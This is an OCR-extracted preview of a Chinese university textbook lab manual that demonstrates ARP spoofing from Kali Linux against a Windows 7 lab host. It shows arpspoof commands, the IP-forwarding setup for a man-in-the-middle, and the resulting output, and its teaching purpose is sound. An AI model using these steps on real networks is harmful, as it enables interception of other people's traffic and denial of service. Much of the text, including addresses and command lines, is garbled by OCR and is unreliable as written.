计算机网络安全技术(第7版)(微课版) 实验手册-ARP欺骗实例-Kali -口令破解_第1页
计算机网络安全技术(第7版)(微课版) 实验手册-ARP欺骗实例-Kali -口令破解_第2页
计算机网络安全技术(第7版)(微课版) 实验手册-ARP欺骗实例-Kali -口令破解_第3页
计算机网络安全技术(第7版)(微课版) 实验手册-ARP欺骗实例-Kali -口令破解_第4页
计算机网络安全技术(第7版)(微课版) 实验手册-ARP欺骗实例-Kali -口令破解_第5页
已阅读5页,还剩177页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

ARP欺骗实例

Kali中利用Arpspoof工具进行ARP攻击

ARP攻击是利用A即协议设计时缺乏安全验证漏洞来实现的,通过伪造A即数据包来

窃取合法用户的通信数据,造成影响网络传输速率和盗取用户隐私信息等危害。

我们进入我们的目标主机系统Windows7,我们通过::md命令查询一下目标主机系统的

IP地址,我们在Windows终端内输入:ipconfig命令,可以看到我地址为35,

网关地址为:192.168.1882。

国IC:\Windows\sy5tem32\cmd.exe

MicrosoftWindows[版本6.1.7601]

版权所有<c>2009MicrosoftCorporation^保留所有权利。

:\Users\adnin>ipconfig

WindowsIP配置

以太网适配器本地连接:

寺定的DNS

7IPv6:fe80::e09a:e261:29af:c321xll

1..:192.168.188.135

:255.255.255.0

:192.168.188.2

隧道适配器isatap.<BBF6CDC3-34D0-4482-BCBC-054B49C7E636):

薪鬣的,最看线:媒体已断开

:\Users\adnin>a

我们在通过ping命令来测试一下目标主机网络是否通信正常,我们ping一下新浪,回车后

我们可以看到网络通信止常。

:\Users\adnin>pingv/ww.sina.con

二在

二Pingspool[0]具有字节的数据:

id回

L

、0V主节=32时间=3nsTTL=128

J-自

、0l:字节=32日;间=2msTTL=128

、0|:定节=32年间T2msTTL=128

、0f:字节=32时间=2in~sTTL=128

60的Ping统计信息:

色上弓卷送=提灰=%丢失=。〈取丢失),

:的估寻奇融以量秒为聿(金

.O-2ms,眼长-12ns,平均-4ms

我们回到Kali系统,在终端内输入:ping192.168.18&135命令,确认与目标系统网络通

信正常。

o・*Wiredconnection1O

连接名痔(N)Wiredconnection!

常规以太网802.1X安全性DCB代理IPv4ifl・IPv6设置

ififi(D)

克隆的MAC地址回

MTU自动+字节

•丈认旧物理(P)单描(U)多懵什)

LAN唤醒

忽略。:rffl(B)地址解析例议(A)幻敛接包(G)

LAN唉时更码(W)

植路协商(K)忽略

速度⑸100Mb/»

双工(X)全双工

取消(C)✓保存(S)

OWiredconnection1

连接名称(N)Wiredconnection!

京规以太网802.1X安全性DCB代理》丫4设置IPv5ifi・

方法(M)手动▼

地址

地址子网俺码网关那加(A)

205410.4.

■除⑼

DNSA6务器M114.114.1K.114

搜索域(E)

DHCP客户选ID

篙要IPv4地址完成这个连接

路由(R)…

取消(Q/保存⑸

।—(adminl®bogon)-[*]

L$ping35I

PING35(192.168.188.135)56(84)bytesofdata.

64bytesfrom192.168.188.135:icmp_seq=lttl=128time=0.619ms

64bytesfrom192.168.188.135:icmp_seq=2ttl=128time=0.255ms

64bytesfrom192.168.188.135:icmp_seq=3ttl=128time=0.229ms

64bytesfrom192.168.188.135:icmp_seq=4ttl=128time=0.283ms

AC

——35pingstatistics——

4packetstransmitted,4received,0%packetloss,time3076ms

rttmin/avg/max/mdev=0.229/0.346/0.619/0.158ms

我们再输入:ping命令,确认与网关通信正常。

-$ping

PING()56(84)bytesofdata.

64bytesfrom:icmp_seq=lttl=128time=0.221ms

64bytesfrom:icmp_seq=2ttl=128time=0.115ms

64bytesfrom:icmp_seq=3ttl=128time=0.160ms

64bytesfrom192.168.188J2:icmp_seq=4ttl=128time=0.211ms

64bytesfrom:icmp_seq=5ttl=128time=0.118ms

64bytesfrom:icmp_seq=6ttl=128time=0.067ms

64bytesfrom:icmp_seq=7ttl=128time=0.215ms

AC

—pingstatistics—

7packetstransmitted,7received,0%packetloss,time6142ms

rttmin/avg/max/mdev=0.067/0.158/0.221/0.055ms

确认网络状态后我们来构造ARP攻击命令,我们在终端内输入:arpspoof-iethO-t

35命令,其中i参数为我们本机指定的网卡eth令t参数为我们

要攻击的目标主机。回车后我们可以看到Kali会不停截取目标主机发向网关的数据包。

-(adminl^bogon)-[*]

C$现及arpspoof-ieth0-t35

0:c:29:c6:83:a0:c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

我们回到Windows主机,通过在终端内使用ping命令来确认网络状态,我们ping新浪

后发现已无法正常的网络通信。

C:Misers\adnin>pingwww.sina.com

潘求找木刻王机www.sina.con,>请检查该名称,然后重试。

至此我们通过arpspoof工具造成了目标主机的网络断网的实验就完成了。

下面我们来介绍一下使用arpspoof工具进行ARP欺骗的示例,我们打开Kali终端,在

终端内输入:/proc/sys/noi/ipv4/ip_forward命令,ip_for\vard是配置文件,默认内容为0,表

示IP转发是关闭的,使用上述命令'echoT>/proc/sys/net/ipv4/ipforward,将该配置文件

的内容改写为1,表示开启1P转发。

一~

ecno"1'/proc/sys/net/ipv4/ip_forward

开启IP转发后流最会经过Kali的主机后再到目标主机,所以我们在使用arpspoof工具时

FI标主机就不会断网,因为流量通过了Kali主机我们就可以获取相关数据。我们下面的操作主

要内容是:发送伪造的ARP请求包,修改目标主机中ARP缓存表,实施ARP欺骗。当攻

击完成后,我们通过controI+C的命令结束ARP的欺骗操作。我们现在开始进行演示,

我们在Kali终端内输入:arpspoof-iethO-t3528命令,回车

后Kali会向Windows(192,168.188.135)发送ARP响应包,告诉Windows目标主机

192.168.188,128就是网关地址。

一(root©bogon)•-[**]

tarpspoof-i(?th0-t35

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:?9:r6:R^0r:79:h:14:dS0H0647:arprpply19?.1RR.1R8.?is-at0:c:29:r6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a

现在我们就完成了对目标Windows主机的网络欺骗,目标主机会将所有的流量戮据先

发给我们Kali主机,同样发送到目标主机的流量数据也会先发送到我们Kali主机中。我们登

录到目标Windows系统,可以通过在终端内输入ping命令来测试网络是否能够正常通信,

我们在终端中输入:ping-t这时我们可以看到Windows系统到新浪的网络

状态是正常通信的。

lh

H

4

、回节「-

3

—2日

=

三二m

二》-

t

128

TTL=

60

.37.

49.7

=3

二^回

节一-

~

3

2

m

=

^二

三□

=3

128

TTL=

60

.37.

49.7回

」节-

n

2

2

uh

C

m

、=

三i

=3

J

回D

M

128

TTL=

60

.37.

49.7

士节-

2

2二日

m

=3

回=

uh

-

、i

128

TTL=

60

.37.

49.7

-一

J

H

节-

=3

3

2二

T

C

一m

=

二I

m

y

^

128

TTL=

60

.37.

49.7

=3

Mh

.

节-

2

、2

m

O

I

三—=

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论